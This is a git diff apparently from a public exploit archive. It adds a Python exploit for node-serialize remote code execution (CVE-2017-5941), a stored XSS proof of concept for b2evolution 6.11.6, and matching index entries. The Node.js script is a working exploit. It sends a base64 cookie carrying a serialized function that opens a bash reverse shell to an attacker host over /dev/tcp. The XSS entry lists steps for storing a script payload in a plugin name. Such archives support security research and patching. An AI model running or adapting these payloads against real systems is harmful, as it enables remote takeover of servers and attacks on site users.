diff --git a/exploits/nodejs/webapps/49552.py b/exploits/nodejs/webapps/49552.py new file mode 100755 index 000000000..aa6d3d82c --- /dev/null +++ b/exploits/nodejs/webapps/49552.py @@ -0,0 +1,36 @@ +# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2) +# Exploit Author: UndeadLarva +# Software Link: https://www.npmjs.com/package/node-serialize +# Version: 0.0.4 +# CVE: CVE-2017-5941 + +import requests +import re +import base64 +import sys + +url = 'http://192.168.100.133:8000/' # change this + +payload = ("require('http').ServerResponse.prototype.end = (function (end) {" +"return function () {" +"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));" +"console.log('still inside');" +"const { exec } = require('child_process');" +"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this +"}" +"})(require('http').ServerResponse.prototype.end)") + +# rce = "_$$ND_FUNC$$_process.exit(0)" +# code ="_$$ND_FUNC$$_console.log('behind you')" +code = "_$$ND_FUNC$$_" + payload + +string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}' + +cookie = {'profile':base64.b64encode(string)} + +try: + response = requests.get(url, cookies=cookie).text + print response +except requests.exceptions.RequestException as e: + print('Oops!') + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/49551.txt b/exploits/php/webapps/49551.txt new file mode 100644 index 000000000..0efc0fa81 --- /dev/null +++ b/exploits/php/webapps/49551.txt @@ -0,0 +1,18 @@ +# Exploit Title: b2evolution 6.11.6 - 'plugin name' Stored XSS +# Date: 09/02/2021 +# Exploit Author: Soham Bakore, Nakul Ratti +# Vendor Homepage: https://b2evolution.net/ +# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405 +# Version: 6.11.6 +# Tested on: latest version of Chrome, Firefox on Windows and Linux +# CVE : CVE-2020-22841 + + +--------------------------Proof of Concept----------------------- + +1. Login with an account having high privileges   +2. Navigate to System -> Plugins and select any plugin +3. Change the plugin name and enter the following payload  "> in the name parameter +4. Payload gets stored in the database +5. The payload gets executed after the victim checks the plugin page. +6. This vulnerability needs high privilege and can affect other users with similar privileges \ No newline at end of file diff --git a/exploits/windows/local/49530.txt b/exploits/windows/local/49530.txt index f24bc91e1..920b7430f 100644 --- a/exploits/windows/local/49530.txt +++ b/exploits/windows/local/49530.txt @@ -6,6 +6,7 @@ # Software Link: https://download.millewin.it/files/Millewin/setup/InstMille_Demo_13.39_2019PS.exe # Version: 13.39.028 – 146.1.9 # Tested on: Microsoft Windows 10 Enterprise x64 +# CVE: CVE-2021-3394 Millennium Millewin also known as "Cartella clinica" diff --git a/files_exploits.csv b/files_exploits.csv index 637808d56..31e8df392 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43740,3 +43740,5 @@ id,file,description,date,author,type,platform,port 49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php, 49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php, 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple, +49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php, +49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,